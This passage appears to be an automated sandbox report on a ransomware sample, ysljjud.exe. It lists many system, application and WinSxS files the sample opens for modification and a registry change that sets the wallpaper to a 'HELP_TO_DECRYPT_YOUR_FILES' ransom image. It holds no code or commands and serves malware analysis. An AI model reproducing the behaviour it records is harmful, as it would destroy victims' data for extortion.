| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_EnvironmentResource\en-US\MSFT_EnvironmentResource.strings.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_EnvironmentResource\ja-JP\MSFT_EnvironmentResource.strings.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\SecureBoot\SecureBoot.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\@VpnToastIcon.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\iSCSI\iSCSI.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\NetEventPacketCapture\NetEventPacketCapture.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_GroupResource\uk-UA\MSFT_GroupResource.strings.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\fr-FR\lpeula.rtf | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\it-IT\Microsoft.PowerShell.ODataUtilsStrings.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\NetAdapter\NetAdapter.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\GroupSet\GroupSet.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_RegistryResource\uk-UA\MSFT_RegistryResource.strings.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\Licenses\neutral\_Default\Professional\de-license.rtf | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\MSDRM\MsoIrmProtector.xls | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\ISE\ise.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\en-US\Licenses\OEM\Professional\license.rtf | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\fr-FR\default.help.txt | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AssignedAccess\es-ES\AssignedAccessMsg.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\MsDtc\it-IT\TestDtc.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\NetTCPIP\NetTCPIP.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\fr-FR\RunAsHelper.strings.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\de-DE\Licenses\OEM\Professional\license.rtf | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\en-US\Licenses\Volume\Professional\license.rtf | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\en-US\lpeula.rtf | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\fr-FR\Licenses\Volume\Professional\license.rtf | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\NetSwitchTeam\NetSwitchTeam.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\System32\LogFiles\WMI\Diagtrack-Listener.etl.001 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_RegistryResource\en-US\MSFT_RegistryResource.strings.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\it-IT\default.help.txt | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_UserResource\fr-FR\MSFT_UserResource.strings.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\MSDRM\MsoIrmProtector.doc | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AssignedAccess\uk-UA\AssignedAccessMsg.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\EventTracingManagement\EventTracingManagement.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Security\Microsoft.PowerShell.Security.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\NetNat\NetNat.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCClassResources\WindowsPackageCab\ja-JP\WindowsPackageCab.Strings.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_RoleResource\de-DE\MSFT_RoleResourceStrings.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\en-US\Licenses\_Default\Professional\license.rtf | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AssignedAccess\it-IT\AssignedAccessMsg.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\ja-JP\BitLocker.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_EnvironmentResource\de-DE\MSFT_EnvironmentResource.strings.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_EnvironmentResource\es-ES\MSFT_EnvironmentResource.strings.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\WebDownloadManager\WebDownloadManager.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Archive\de-DE\ArchiveResources.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_GroupResource\en-US\MSFT_GroupResource.strings.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\VMDirectStorage\VMDirectStorage.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\uk-UA\lipeula.rtf | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\HELP_TO_DECRYPT_YOUR_FILES.bmp" | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_1.0.6.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\WeatherAppList.targetsize-32_altform-lightunplated_contrast-black.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.GetHelp_10.2008.32311.0_x64__8wekyb3d8bbwe\Assets\contrast-white\GetHelpLargeTile.scale-200_contrast-white.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.6.10571.0_x64__8wekyb3d8bbwe\Images\Square44x44Logo.scale-200_contrast-white.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\theme\lib\motion\FluentMotion.js | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\theme\node_modules\@uifabric\utilities\lib\selection\Selection.types.js | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\Configuration\card_expiration_terms_dict.txt | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Paint_10.2104.17.0_x64__8wekyb3d8bbwe\Assets\contrast-white\PaintAppList.targetsize-48.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\1851_24x24x32.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\EdgeCore\90.0.818.66\Locales\devtools\es.pak | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\react\lib\components\DocumentCard\DocumentCard.base.js | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\theme\lib-amd\FluentTheme.js | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingNews_1.0.6.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\NewsAppList.targetsize-30_altform-unplated_contrast-white.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.6.3102.0_x64__8wekyb3d8bbwe\Win10\contrast-black\MicrosoftSolitaireAppList.targetsize-36_altform-unplated_contrast-black.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.6.3102.0_x64__8wekyb3d8bbwe\Win10\MicrosoftSolitaireAppList.targetsize-16_contrast-white.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_4.0.2.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\Icons\StickyNotesSmallTile.scale-100_contrast-white.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.People_10.1909.12456.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-white\PeopleLargeTile.scale-100.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\react\lib-commonjs\Nav.js | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\export.svg | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\pt-br\ui-strings.js | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ScreenSketch_11.2104.2.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-black\SnipSketchLargeTile.scale-125.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_2.2106.2807.0_x64__8wekyb3d8bbwe\Assets\Store\Wide310x150Logo.scale-400.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Getstarted_10.2.41172.0_x64__8wekyb3d8bbwe\Assets\TipsAppList.targetsize-30_altform-lightunplated_contrast-white.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.40978.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-48.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.People_10.1909.12456.0_x64__8wekyb3d8bbwe\Assets\PeopleAppList.targetsize-16_altform-lightunplated.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\theme\node_modules\@uifabric\utilities\lib-amd\object.js | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\sl.txt | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\AugLoop\bundle.js | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.40831.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-80_contrast-white.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_1.0.36.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.targetsize-96_altform-unplated_contrast-black.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailBadge.scale-150.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_1.0.22.0_x64__8wekyb3d8bbwe\Assets\AppTiles\MapsAppList.targetsize-36.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsStore_12104.1001.1.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\StoreStoreLogo.scale-200.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\react\lib-commonjs\DatePicker.js | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_2.2106.2807.0_x64__8wekyb3d8bbwe\Assets\Store\SplashScreen.scale-200_contrast-white.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.41182.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-36_contrast-white.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Windows.Photos_21.21030.25003.0_x64__8wekyb3d8bbwe\AppCS\Assets\FirstTimeUse.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.2103.1172.0_x64__8wekyb3d8bbwe\Assets\FeedbackHubAppList.targetsize-36_altform-lightunplated.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_1.0.22.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MapsAppList.targetsize-80_altform-unplated_contrast-black.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected] | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.People_10.1909.12456.0_x64__8wekyb3d8bbwe\Assets\contrast-black\PeopleAppList.targetsize-256_altform-unplated.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.StorePurchaseApp_12008.1001.1.0_x64__8wekyb3d8bbwe\Assets\AppTiles\StoreSplashScreen.scale-200_altform-colorful_theme-dark.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_1.0.36.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.targetsize-80_contrast-black.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarSmallTile.scale-125.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsStore_12104.1001.1.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\StoreAppList.targetsize-30.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\EdgeCore\90.0.818.66\ResiliencyLinks\Locales\en-US.pak.DATA | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\ResiliencyLinks\Locales\devtools\ru.pak.DATA | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.40831.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-80_altform-unplated_contrast-white.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_1.0.22.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MapsMedTile.scale-200_contrast-black.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.XboxSpeechToTextOverlay_1.17.29001.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\GamesXboxHubSplashScreen.scale-100.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ar-ae\ui-strings.js | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\fullscreen-press.svg | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.GetHelp_10.2008.32311.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-black\GetHelpStoreLogo.scale-100_contrast-black.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.41182.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-48_contrast-black.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\HxA-GoogleCloudCache.scale-150.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.21012.10511.0_x64__8wekyb3d8bbwe\Assets\contrast-black\OrientationControlCone.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\icons.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\theme\node_modules\@uifabric\merge-styles\lib-amd\concatStyleSetsWithProps.js | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\theme-2x.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.42251.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageAppList.targetsize-96_altform-unplated_contrast-black.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2104.12721.0_neutral_split.scale-125_8wekyb3d8bbwe\Images\splashscreen.scale-125_altform-colorful_theme-dark.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.41182.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.scale-200_contrast-white.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.2103.1172.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\FeedbackHubStoreLogo.scale-100.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsStore_12104.1001.1.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\StoreAppList.targetsize-64_altform-unplated.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\EdgeCore\90.0.818.66\ResiliencyLinks\Locales\kok.pak.DATA | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-c..riencehost.appxmain_31bf3856ad364e35_10.0.22000.176_none_fded9bd0d2f09976\hololensDiagnostics-vm.js | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-n..quickstart.appxmain_31bf3856ad364e35_10.0.22000.120_none_8faca973dc064b74\NarratorWideTile.scale-400_contrast-white.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-p..iagnostic.resources_31bf3856ad364e35_10.0.22000.1_es-es_81eb1cc7d8be7772\RS_ResetDisplayIdleTimeout.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.22000.493_none_81cdab704eaad423\Assets\GetStartedAppList.targetsize-24_altform-unplated.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\wow64_microsoft.packagema..agesource.resources_31bf3856ad364e35_10.0.22000.1_uk-ua_e2e108395fff8956\MSFT_PackageManagementSource.strings.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-p..iagnostic.resources_31bf3856ad364e35_10.0.22000.120_pl-pl_26899efcc7265be0\f\RS_Balanced.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\wow64_microsoft.security...gement.policyengine_31bf3856ad364e35_10.0.22000.1_none_8dcd4f75280fb792\AppLocker.psd1 | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-l..oem-coren.resources_31bf3856ad364e35_10.0.22000.493_pl-pl_290c927de5ea0ea6\f\license.rtf | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.22000.493_none_81cdab704eaad423\f\StartMenu\Assets\FileIcons\32\sysfile.svg | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-m..nt-browser.appxmain_31bf3856ad364e35_10.0.22000.120_none_f759261c81fa2ed8\SplashScreen.contrast-white_scale-400.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-l..fessional.resources_31bf3856ad364e35_10.0.22000.493_sk-sk_d77d8e32816e6c92\f\license.rtf | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SystemApps\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\webapps\inclusiveOobe\js\autopilot\devicesetupcategoryviewmodel.js | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| File opened for modification | C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\assets\NarratorWideTile.scale-400_contrast-black.png | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
